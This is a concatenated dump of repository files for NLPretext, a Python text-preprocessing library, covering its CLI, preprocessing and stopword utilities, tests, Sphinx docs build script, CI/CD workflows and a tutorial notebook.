def run( 14 | input: List[str] = typer.Option( # noqa: B008 15 | [], 16 | "-i", 17 | "--input", 18 | case_sensitive=False, 19 | help="List of files that will be preprocessed", 20 | ), 21 | output: str = typer.Option( 22 | None, 23 | "-o", 24 | "--output", 25 | case_sensitive=False, 26 | help="File that will store the result of the preprocessing", 27 | ), 28 | ) -> None: 29 | """Runs NLPretext on a list of files and outputs the result in parquet format 30 | or shows the result if no output is provided. 31 | 32 | Args: 33 | 34 | input: List of files that will be preprocessed 35 | 36 | output: File that will store the result of the preprocessing 37 | """ 38 | text_loader = TextLoader() 39 | preprocessor = Preprocessor() 40 | preprocessed_text_dataframe = text_loader.read_text(input, preprocessor=preprocessor) 41 | if output: 42 | preprocessed_text_dataframe.to_parquet(output) 43 | else: 44 | console.print(preprocessed_text_dataframe) 45 | -------------------------------------------------------------------------------- /nlpretext/__init__.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | 19 | # mypy: disable-error-code="attr-defined" 20 | # mypy: disable-error-code="assignment" 21 | 22 | """All the goto functions you need to handle NLP use-cases, integrated in NLPretext.""" 23 | 24 | from importlib.metadata import PackageNotFoundError, version 25 | 26 | from nlpretext.preprocessor import Preprocessor 27 | 28 | try: 29 | __version__ = version(__name__) 30 | except PackageNotFoundError: # pragma: no cover 31 | __version__ = "unknown" 32 | 33 | 34 | __all__ = ["Preprocessor"] 35 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | default_language_version: 2 | python: python3.10 3 | 4 | 5 | repos: 6 | - repo: https://github.com/pre-commit/pre-commit-hooks 7 | rev: v4.5.0 8 | hooks: 9 | - id: trailing-whitespace 10 | - id: end-of-file-fixer 11 | - id: check-yaml 12 | - id: check-toml 13 | - id: check-json 14 | - id: check-added-large-files 15 | 16 | - repo: local 17 | hooks: 18 | - id: isort 19 | name: isort 20 | entry: poetry run isort --settings-path pyproject.toml 21 | types: [python] 22 | language: system 23 | stages: [commit, push] 24 | - id: pyupgrade 25 | name: pyupgrade 26 | entry: poetry run pyupgrade --py38-plus 27 | types: [python] 28 | language: system 29 | stages: [commit, push] 30 | - id: black 31 | name: black 32 | entry: poetry run black --config pyproject.toml 33 | types: [python] 34 | language: system 35 | stages: [commit, push] 36 | - id: ruff 37 | name: ruf 38 | entry: poetry run ruff check --config pyproject.toml 39 | types: [python] 40 | language: system 41 | stages: [commit, push] 42 | - id: mypy 43 | name: mypy 44 | entry: poetry run mypy 45 | require_serial: true 46 | types: [python] 47 | language: system 48 | stages: [push] 49 | - id: gitleaks 50 | name: gitleaks 51 | entry: make gitleaks 52 | require_serial: true 53 | types: [file] 54 | language: system 55 | pass_filenames: false 56 | stages: [push] 57 | -------------------------------------------------------------------------------- /docs/scripts/buildsite.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | export SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct) 4 | 5 | ############## 6 | # BUILD DOCS # 7 | ############## 8 | 9 | # Python Sphinx, configured with source/conf.py 10 | # See https://www.sphinx-doc.org/ 11 | 12 | cd docs/ 13 | 14 | current_tag=$(git symbolic-ref -q --short HEAD || git describe --tags --exact-match) 15 | current_tag_message=$(git cat-file -p $(git rev-parse $(git tag -l | tail -n1)) | tail -n +6) 16 | 17 | make clean 18 | make apidoc 19 | git add . 20 | git commit -m "Commit needed for multiversioning" 21 | 22 | git pull --tags 23 | git tag -a latest -m "Latest version of the package" 24 | 25 | make multiversion 26 | 27 | ####################### 28 | # Update GitHub Pages # 29 | ####################### 30 | 31 | docroot=`mktemp -d` 32 | cp -r build/html/* ${docroot} 33 | 34 | cd .. 35 | 36 | git branch -d gh-pages 37 | git checkout --orphan gh-pages 38 | git rm --cached -r . 39 | git clean -fdx 40 | 41 | # Adds .nojekyll file to the root to signal to GitHub that 42 | # directories that start with an underscore (_) can remain 43 | touch .nojekyll 44 | 45 | # Add index.html 46 | cat > index.html < 48 | 49 | 50 | Redirecting to the latest release 51 | 52 | 53 | 54 | 55 | 56 | EOF 57 | 58 | # Add README 59 | cat > README.md <> $GITHUB_PATH 63 | 64 | - name: Install dependencies 65 | run: | 66 | poetry run pip install --upgrade pip 67 | poetry install -E torch -E dask 68 | 69 | - name: Run safety checks 70 | run: | 71 | STRICT=1 make check-safety 72 | 73 | - name: Lint and format 74 | run: | 75 | make format-code 76 | 77 | - name: Run tests 78 | run: | 79 | make test 80 | -------------------------------------------------------------------------------- /tests/test_phone_number.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | import nlpretext._utils.phone_number as phone 19 | from nlpretext._config.config import SUPPORTED_COUNTRY 20 | 21 | 22 | def test_extract_phone_number(): 23 | input_str = "(541) 754-3010 is a US. Phone" 24 | expected = ["(541) 754-3010", "754-3010"] 25 | res = phone.extract_phone_numbers(input_str, countrylist=SUPPORTED_COUNTRY) 26 | assert sorted(res) == sorted(expected) 27 | 28 | 29 | def test_extract_phone_number_us(): 30 | input_str = "(541) 754-3010 is a US. Phone" 31 | expected = ["(541) 754-3010"] 32 | res = phone.extract_phone_numbers(input_str, countrylist=["US"]) 33 | assert res == expected 34 | 35 | 36 | def test_extract_phone_number_fr(): 37 | input_str = "06.00.00.00.00 is a FR Phone" 38 | expected = ["06.00.00.00.00"] 39 | res = phone.extract_phone_numbers(input_str, countrylist=["FR"]) 40 | assert res == expected 41 | 42 | 43 | def test_extract_phone_number_international(): 44 | input_str = "+33600000000 is an international Phone number" 45 | expected = ["+33600000000"] 46 | res = phone.extract_phone_numbers(input_str, countrylist=["US", "GB", "FR", None]) 47 | assert res == expected 48 | 49 | 50 | def test_phone_parser_us(): 51 | input_str = "(541) 754-3010" 52 | expected = "+1 541-754-3010" 53 | p = phone.PhoneParser() 54 | p.parse_number(input_str, region_code="US") 55 | res = p.format_number("INTERNATIONAL") 56 | assert res == expected 57 | 58 | 59 | def test_phone_parser_fr(): 60 | input_str = "0600000000" 61 | expected = "+33600000000" 62 | p = phone.PhoneParser() 63 | p.parse_number(input_str, region_code="FR") 64 | res = p.format_number("E164") 65 | assert res == expected 66 | -------------------------------------------------------------------------------- /nlpretext/preprocessor.py: -------------------------------------------------------------------------------- 1 | from typing import Any, Callable, Dict, List, Optional 2 | 3 | from nlpretext.basic.preprocess import fix_bad_unicode, normalize_whitespace, remove_eol_characters 4 | from nlpretext.social.preprocess import ( 5 | remove_emoji, 6 | remove_hashtag, 7 | remove_html_tags, 8 | remove_mentions, 9 | ) 10 | from sklearn.pipeline import Pipeline 11 | from sklearn.preprocessing import FunctionTransformer 12 | 13 | 14 | class Preprocessor: 15 | def __init__(self): 16 | """Initialize preprocessor object to apply all text transformation.""" 17 | self.__operations = [] 18 | self.pipeline = None 19 | 20 | def pipe(self, operation: Callable[[Any], Any], args: Optional[Dict[str, Any]] = None) -> None: 21 | """ 22 | Add an operation and its arguments to pipe in the preprocessor. 23 | 24 | Parameters 25 | ---------- 26 | operation : callable 27 | text preprocessing function 28 | args : dict of arguments 29 | """ 30 | self.__operations.append({"operation": operation, "args": args}) 31 | 32 | @staticmethod 33 | def build_pipeline(operation_list: List[Dict[Any, Any]]) -> Pipeline: 34 | """ 35 | Build sklearn pipeline from a operation list. 36 | 37 | Parameters 38 | ---------- 39 | operation_list : iterable 40 | list of __operations of preprocessing 41 | 42 | Returns 43 | ------- 44 | sklearn.pipeline.Pipeline 45 | """ 46 | return Pipeline( 47 | steps=[ 48 | ( 49 | operation["operation"].__name__, 50 | FunctionTransformer(operation["operation"], kw_args=operation["args"]), 51 | ) 52 | for operation in operation_list 53 | ] 54 | ) 55 | 56 | def run(self, text: str) -> str: 57 | """ 58 | Apply pipeline to text. 59 | 60 | Parameters 61 | ---------- 62 | text : string 63 | text to preprocess 64 | 65 | Returns 66 | ------- 67 | string 68 | """ 69 | operations = self.__operations 70 | if operations == []: 71 | operations_to_pipe = ( 72 | remove_html_tags, 73 | remove_mentions, 74 | remove_emoji, 75 | remove_hashtag, 76 | remove_eol_characters, 77 | fix_bad_unicode, 78 | normalize_whitespace, 79 | ) 80 | operations = [ 81 | {"operation": operation, "args": None} for operation in operations_to_pipe 82 | ] 83 | self.pipeline = self.build_pipeline(operations) 84 | text = self.pipeline.transform(text) 85 | return text 86 | -------------------------------------------------------------------------------- /nlpretext/_utils/stopwords.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | 17 | from typing import List 18 | 19 | from nlpretext._config.stopwords import STOPWORDS 20 | from stop_words import LANGUAGE_MAPPING as _LANGUAGE_MAPPING 21 | from stop_words import get_stop_words as _get_stop_words 22 | 23 | 24 | def get_stopwords(lang: str = "en") -> List[str]: 25 | """Input a language code, returns a list of stopwords for the specified language. 26 | 27 | Parameters 28 | ---------- 29 | lang : str 30 | Supported languages: ['ar', 'bg', 'ca', 'cz', 'da', 'nl', 'en', 31 | 'fi', 'fr', 'de', 'hi', 'hu', 'id', 'it', 'nb', 'pl', 'pt', 'ro', 'ru', 32 | 'sk', 'es', 'sv', 'tr', 'uk', 'vi', 'af', 'ha', 'so', 'st', 'sw', 'yo', 33 | 'zu', 'da', 'de', 'es', 'et', 'fi', 'fr', 'hr', 'hu', 'it', 'ko', 'nl', 34 | 'no', 'pl', 'pt', 'ru', 'sv', 'tr', 'zh', 'eo', 'he', 'la', 'sk', 'sl', 35 | 'br', 'ca', 'cs', 'el', 'eu', 'ga', 'gl', 'hy', 'id', 'ja', 'lv', 'th', 36 | 'ar', 'bg', 'bn', 'fa', 'hi', 'mr', 'ro', 'en'] 37 | 38 | Returns 39 | ------- 40 | list 41 | list of stopwords for a given language 42 | 43 | Raises 44 | ------ 45 | ValueError 46 | When language is not available yet or incorrect country code 47 | """ 48 | if isinstance(lang, str) and len(lang) == 2: 49 | lang = lang.lower() 50 | custom_stopwords = STOPWORDS 51 | stopwords = [] 52 | 53 | supported_lang_lib = list(_LANGUAGE_MAPPING.keys()) 54 | supported_lang_custom = list(custom_stopwords.keys()) 55 | supported_lang = supported_lang_lib + supported_lang_custom 56 | if lang in supported_lang: 57 | if lang in supported_lang_lib: 58 | stopwords += _get_stop_words(lang) 59 | if lang in supported_lang_custom: 60 | stopwords += custom_stopwords[lang] 61 | else: 62 | raise ValueError( 63 | "Language not available yet or incorrect country code." 64 | f" Supported languages: {supported_lang}" 65 | ) 66 | else: 67 | raise ValueError('Please input a valid country code, in 2 letters. Eg. "us" for USA. ') 68 | return list(set(stopwords)) 69 | -------------------------------------------------------------------------------- /tests/test_data_augmentation.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | from nlpretext.augmentation.text_augmentation import ( 3 | CouldNotAugment, 4 | UnavailableAugmenter, 5 | get_augmenter, 6 | process_entities_and_text, 7 | ) 8 | 9 | 10 | @pytest.mark.parametrize( 11 | "text, text_augmented, entities, expected", 12 | [ 13 | ( 14 | "I want to buy a small black handbag.", 15 | "I want to acquire a small black handbag", 16 | [ 17 | {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21}, 18 | {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27}, 19 | {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35}, 20 | ], 21 | {"type": str, "entities": ["black", "handbag", "small"]}, 22 | ), 23 | ( 24 | "I want to buy a small black handbag.", 25 | "I would like to buy a black small handbag", 26 | [ 27 | {"entity": "Size", "word": "small", "startCharIndex": 16, "endCharIndex": 21}, 28 | {"entity": "Color", "word": "black", "startCharIndex": 22, "endCharIndex": 27}, 29 | {"entity": "Type", "word": "handbag", "startCharIndex": 28, "endCharIndex": 35}, 30 | ], 31 | {"type": str, "entities": ["black", "handbag", "small"]}, 32 | ), 33 | ], 34 | ) 35 | def test_process_entities_and_text_not_altered(text, text_augmented, entities, expected): 36 | augmented_text, augmented_entities = process_entities_and_text(entities, text, text_augmented) 37 | augmented_entities = sorted(el["word"] for el in augmented_entities) 38 | assert {"type": type(augmented_text), "entities": augmented_entities} == expected 39 | 40 | 41 | @pytest.mark.parametrize( 42 | "text, text_augmented, entities", 43 | [ 44 | ( 45 | "I live in New York and I am looking for a lipstick", 46 | "I live in New and York I an looking for a lipstick", 47 | [ 48 | {"entity": "City", "word": "New York", "startCharIndex": 10, "endCharIndex": 18}, 49 | {"entity": "Type", "word": "bag", "startCharIndex": 42, "endCharIndex": 50}, 50 | ], 51 | ) 52 | ], 53 | ) 54 | def test_process_entities_and_text_altered(text, text_augmented, entities): 55 | with pytest.raises(CouldNotAugment) as excinfo: 56 | process_entities_and_text(entities, text, text_augmented) 57 | assert ( 58 | str(excinfo.value) == "Text was not correctly augmented because entities were altered" 59 | ) 60 | 61 | 62 | def test_get_augmenter(): 63 | method = "ppdb_synonym" 64 | with pytest.raises(UnavailableAugmenter) as excinfo: 65 | get_augmenter(method) 66 | assert ( 67 | str(excinfo.value) 68 | == "The given augmenter is not supported. You must choose one \ 69 | of the following: wordnet_synonym or aug_sub_bert" 70 | ) 71 | -------------------------------------------------------------------------------- /nlpretext/_utils/file_loader.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | # mypy: disable-error-code="assignment" 19 | 20 | from typing import List, Union 21 | 22 | import chardet 23 | from nlpretext._config import constants 24 | 25 | 26 | def detect_encoding(file_path_or_string: Union[str, bytes], n_lines: int = 100) -> str: 27 | """ 28 | Predict a file's encoding using chardet. 29 | 30 | Parameters 31 | ---------- 32 | file_path_or_string : string 33 | if filepath, will open the file. Otherwise will predict from the string 34 | n_lines : int 35 | number of line to predict from 36 | 37 | Returns 38 | ------- 39 | string 40 | the code of the detected encoding 41 | """ 42 | if isinstance(file_path_or_string, bytes): 43 | rawdata = file_path_or_string 44 | else: 45 | with open(file_path_or_string, "rb") as f: 46 | rawdata = b"".join([f.readline() for _ in range(n_lines)]) 47 | chardet_value: str = chardet.detect(rawdata) 48 | return chardet_value 49 | 50 | 51 | def check_text_file_format(filepath: Union[str, List[str]]) -> str: 52 | """ 53 | Retrieve format of a file path or list of files path, among .csv, .json, .parquet and .txt. 54 | 55 | Parameters 56 | ---------- 57 | filepath : str | list(str) 58 | A filepath with wildcard (eg. *.txt), or a list of filepaths. 59 | 60 | Returns 61 | ------- 62 | str 63 | Format of the specified file path, among .json, .csv, .parquet or .txt 64 | """ 65 | pattern = constants.TEXT_FILE_FORMATS_PATTERN 66 | if not isinstance(filepath, (list, tuple)): 67 | filepath = [filepath] 68 | format_re_list = [pattern.match(path) for path in filepath] 69 | format_list = [format_re.group(1) for format_re in format_re_list if format_re] 70 | if len(set(format_list)) > 1: 71 | raise ValueError(f"Multiple file formats found in file path list: {format_list}") 72 | if None in format_re_list: 73 | raise ValueError( 74 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted" # noqa: E501 75 | ) 76 | file_format = format_list[0] 77 | return file_format 78 | -------------------------------------------------------------------------------- /docs/source/conf.py: -------------------------------------------------------------------------------- 1 | # Configuration file for the Sphinx documentation builder. 2 | # 3 | # This file only contains a selection of the most common options. For a full 4 | # list see the documentation: 5 | # https://www.sphinx-doc.org/en/master/usage/configuration.html 6 | 7 | # -- Path setup -------------------------------------------------------------- 8 | 9 | # If extensions (or modules to document with autodoc) are in another directory, 10 | # add these directories to sys.path here. If the directory is relative to the 11 | # documentation root, use os.path.abspath to make it absolute, like shown here. 12 | # 13 | import os 14 | import sys 15 | 16 | sys.path.insert(0, os.path.abspath("..")) 17 | 18 | 19 | # -- Project information ----------------------------------------------------- 20 | 21 | project = "nlpretext" 22 | author = "artefactory" 23 | 24 | # -- General configuration --------------------------------------------------- 25 | 26 | # Add any Sphinx extension module names here, as strings. They can be 27 | # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom 28 | # ones. 29 | extensions = [ 30 | "sphinx.ext.autodoc", 31 | "sphinx.ext.autosummary", 32 | "sphinx.ext.intersphinx", 33 | "sphinx.ext.mathjax", 34 | "sphinx.ext.napoleon", 35 | "sphinx.ext.todo", 36 | "sphinx.ext.viewcode", 37 | "recommonmark", 38 | "nbsphinx", 39 | "sphinx_multiversion", 40 | "sphinx_autodoc_typehints", 41 | "sphinx_rtd_theme", 42 | ] 43 | 44 | source_suffix = { 45 | ".rst": "restructuredtext", 46 | ".txt": "restructuredtext", 47 | ".md": "markdown", 48 | } 49 | 50 | source_parsers = {".md": "recommonmark.parser.CommonMarkParser"} 51 | 52 | nbsphinx_execute = "never" 53 | 54 | github_url = "https://github.com/artefactory/NLPretext" 55 | 56 | smv_prefer_remote_refs = False 57 | smv_remote_whitelist = None 58 | smv_prebuild_command = ( 59 | "poetry run sphinx-apidoc -f -o source/apidoc/ " 60 | "../nlpretext/ " 61 | "--implicit-namespaces -M -t source/_templates" 62 | ) 63 | 64 | # Add any paths that contain templates here, relative to this directory. 65 | templates_path = ["_templates"] 66 | 67 | # Autodoc parameters 68 | always_document_param_types = True 69 | add_module_names = False 70 | autodoc_member_order = "bysource" 71 | 72 | # -- Options for HTML output ------------------------------------------------- 73 | 74 | # The theme to use for HTML and HTML Help pages. See the documentation for 75 | # a list of builtin themes. 76 | 77 | html_theme = "sphinx_rtd_theme" 78 | 79 | github_url = "https://www.github.com/artefactory/NLPretext}" 80 | 81 | 82 | # Add any paths that contain custom static files (such as style sheets) here, 83 | # relative to this directory. They are copied after the builtin static files, 84 | # so a file named "default.css" will overwrite the builtin "default.css". 85 | html_static_path = ["_static"] 86 | 87 | # -- Options for LaTeX output ------------------------------------------------ 88 | 89 | latex_elements = { 90 | # Font packages 91 | "fontpkg": "\\usepackage{amsmath, amsfonts, amssymb, amsthm}" 92 | } 93 | -------------------------------------------------------------------------------- /docs/source/tutorials/basic_notebook.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# How to use the package in a notebook\n", 8 | "\n", 9 | "
\n", 10 | "\n", 11 | "
\n", 12 | "\n", 13 | "![Python Logo](../_static/images/python_logo.png)\n", 14 | "\n", 15 | "
\n", 16 | "\n", 17 | "### *nlpretext*\n", 18 | "\n", 19 | "
\n", 20 | "\n", 21 | "## Installing from the main branch\n", 22 | "\n", 23 | "To install the library from the main branch, you can run the following cell :" 24 | ] 25 | }, 26 | { 27 | "cell_type": "code", 28 | "execution_count": null, 29 | "metadata": { 30 | "pycharm": { 31 | "name": "#%%\n" 32 | } 33 | }, 34 | "outputs": [], 35 | "source": [ 36 | "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@main" 37 | ] 38 | }, 39 | { 40 | "cell_type": "markdown", 41 | "metadata": {}, 42 | "source": [ 43 | "## Installing from a specific release\n", 44 | "\n", 45 | "To install the library from a specific release, you can run the following cell :" 46 | ] 47 | }, 48 | { 49 | "cell_type": "code", 50 | "execution_count": null, 51 | "metadata": { 52 | "pycharm": { 53 | "name": "#%%\n" 54 | } 55 | }, 56 | "outputs": [], 57 | "source": [ 58 | "%pip install git+ssh://git@github.com/artefactory/NLPretext.git@v1.0.5" 59 | ] 60 | }, 61 | { 62 | "cell_type": "markdown", 63 | "metadata": {}, 64 | "source": [ 65 | "## Using the package\n", 66 | "\n", 67 | "You can now import and run whatever is in the package :" 68 | ] 69 | }, 70 | { 71 | "cell_type": "code", 72 | "execution_count": null, 73 | "metadata": { 74 | "pycharm": { 75 | "name": "#%%\n" 76 | } 77 | }, 78 | "outputs": [], 79 | "source": [ 80 | "from nlpretext.basic.preprocess import replace_emails\n", 81 | "\n", 82 | "example = \"I have forwarded this email to obama@whitehouse.gov\"\n", 83 | "example = replace_emails(example, replace_with=\"*EMAIL*\")" 84 | ] 85 | }, 86 | { 87 | "cell_type": "code", 88 | "execution_count": null, 89 | "metadata": { 90 | "pycharm": { 91 | "name": "#%%\n" 92 | } 93 | }, 94 | "outputs": [], 95 | "source": [ 96 | "print(example)" 97 | ] 98 | } 99 | ], 100 | "metadata": { 101 | "kernelspec": { 102 | "display_name": "Python 3", 103 | "language": "python", 104 | "name": "python3" 105 | }, 106 | "language_info": { 107 | "codemirror_mode": { 108 | "name": "ipython", 109 | "version": 3 110 | }, 111 | "file_extension": ".py", 112 | "mimetype": "text/x-python", 113 | "name": "python", 114 | "nbconvert_exporter": "python", 115 | "pygments_lexer": "ipython3", 116 | "version": "3.7.9" 117 | } 118 | }, 119 | "nbformat": 4, 120 | "nbformat_minor": 1 121 | } 122 | -------------------------------------------------------------------------------- /.github/workflows/cd.yml: -------------------------------------------------------------------------------- 1 | name: Continuous Deployment 2 | on: 3 | release: 4 | types: [published] 5 | 6 | jobs: 7 | 8 | docker: 9 | 10 | runs-on: ubuntu-latest 11 | 12 | steps: 13 | - name: Checkout 14 | uses: actions/checkout@v4 15 | 16 | - name: Set up Docker Buildx 17 | uses: docker/setup-buildx-action@v3 18 | 19 | - name: Login to Github Container Registry 20 | uses: docker/login-action@v3 21 | with: 22 | username: ${{ github.actor }} 23 | password: ${{ secrets.GITHUB_TOKEN }} 24 | registry: ghcr.io 25 | 26 | - name: Set tag name 27 | id: tag 28 | run: echo "tag_name=${GITHUB_REF//\//-}" >> $GITHUB_OUTPUT 29 | env: 30 | GITHUB_REF: ${{ github.ref }} 31 | 32 | - name: Build and push 33 | uses: docker/build-push-action@v4 34 | with: 35 | context: . 36 | file: ./docker/Dockerfile 37 | push: true 38 | tags: | 39 | ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }} 40 | ghcr.io/artefactory/nlpretext:latest 41 | cache-from: type=registry,ref=ghcr.io/artefactory/nlpretext:latest 42 | cache-to: type=inline 43 | 44 | - name: Scan image 45 | uses: anchore/scan-action@v3 46 | id: scan 47 | with: 48 | image: "ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}" 49 | output-format: table 50 | 51 | - name: upload Anchore scan SARIF report 52 | if: success() || failure() 53 | uses: github/codeql-action/upload-sarif@v1 54 | with: 55 | sarif_file: ${{ steps.scan.outputs.sarif }} 56 | 57 | documentation_and_package: 58 | 59 | runs-on: ubuntu-latest 60 | 61 | strategy: 62 | matrix: 63 | python-version: ["3.8"] 64 | 65 | steps: 66 | 67 | - name: Checkout 68 | uses: actions/checkout@v4 69 | 70 | - name: Set up Python ${{ matrix.python-version }} 71 | uses: actions/setup-python@v4 72 | with: 73 | python-version: ${{ matrix.python-version }} 74 | 75 | - name: Install poetry and pandoc 76 | run: | 77 | sudo apt-get install pandoc 78 | make download-poetry 79 | 80 | - name: Set up cache 81 | uses: actions/cache@v3.3.2 82 | with: 83 | path: ~/.cache/pypoetry/virtualenvs 84 | key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }} 85 | 86 | - name: Set Poetry Path 87 | run: | 88 | echo "$HOME/.poetry/bin" >> $GITHUB_PATH 89 | 90 | - name: Install dependencies 91 | run: | 92 | poetry install -E torch -E dask 93 | 94 | - name: Publish to PyPI 95 | env: 96 | PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }} 97 | run: | 98 | poetry config pypi-token.pypi $PYPI_TOKEN 99 | poetry publish --build 100 | 101 | - name: Run build script for Sphinx pages 102 | run: | 103 | poetry run git config --global user.name "Github-Pages Bot" 104 | poetry run git config --global user.email "github-pages@artefactory.com" 105 | poetry run sh docs/scripts/buildsite.sh 106 | shell: bash 107 | -------------------------------------------------------------------------------- /nlpretext/token/preprocess.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | 17 | from typing import List, Optional 18 | 19 | import re 20 | 21 | from nlpretext._utils.stopwords import get_stopwords 22 | 23 | 24 | def remove_stopwords( 25 | tokens: List[str], lang: str, custom_stopwords: Optional[List[str]] = None 26 | ) -> List[str]: 27 | """ 28 | Remove stopwords from a text. 29 | eg. 'I like when you move your body !' -> 'I move body !'. 30 | 31 | Parameters 32 | ---------- 33 | tokens: list(str) 34 | list of tokens 35 | lang: str 36 | language iso code (e.g : "en") 37 | custom_stopwords : list(str)|None 38 | list of custom stopwords to add. None by default 39 | 40 | Returns 41 | ------- 42 | list 43 | tokens without stopwords 44 | 45 | Raises 46 | ------ 47 | ValueError 48 | When inputs is not a list 49 | """ 50 | stopwords = get_stopwords(lang) 51 | if custom_stopwords: 52 | stopwords += custom_stopwords 53 | tokens = [word for word in tokens if word not in stopwords] 54 | return tokens 55 | 56 | 57 | def remove_tokens_with_nonletters(tokens: List[str]) -> List[str]: 58 | """ 59 | Inputs a list of tokens, outputs a list of tokens without tokens that 60 | includes numbers of special caracters. 61 | ['foo','bar','124','34euros'] -> ['foo','bar']. 62 | 63 | Parameters 64 | ---------- 65 | tokens : list 66 | list of tokens to be cleaned 67 | 68 | Returns 69 | ------- 70 | list 71 | list of tokens without tokens with numbers 72 | """ 73 | tokens = [word for word in tokens if re.search("[^a-zA-Z]", word) is None] 74 | return tokens 75 | 76 | 77 | def remove_special_caracters_from_tokenslist(tokens: List[str]) -> List[str]: 78 | """ 79 | Remove tokens that doesn't contains any number or letter. 80 | eg. ['foo','bar','---',"'s",'#'] -> ['foo','bar',"'s"]. 81 | 82 | Parameters 83 | ---------- 84 | tokens : list 85 | list of tokens to be cleaned 86 | 87 | Returns 88 | ------- 89 | list 90 | list of tokens without tokens that contains only special caracters 91 | 92 | """ 93 | tokens = [word for word in tokens if re.search("[a-zA-Z0-9]", word)] 94 | return tokens 95 | 96 | 97 | def remove_smallwords(tokens: List[str], smallwords_threshold: int) -> List[str]: 98 | """ 99 | Function that removes words which length is below a threshold 100 | ["hello", "my", "name", "is", "John", "Doe"] --> ["hello","name","John","Doe"]. 101 | 102 | Parameters 103 | ---------- 104 | text : list 105 | list of strings 106 | smallwords_threshold: int 107 | threshold of small word 108 | 109 | Returns 110 | ------- 111 | list 112 | """ 113 | tokens = [word for word in tokens if len(word) > smallwords_threshold] 114 | return tokens 115 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language 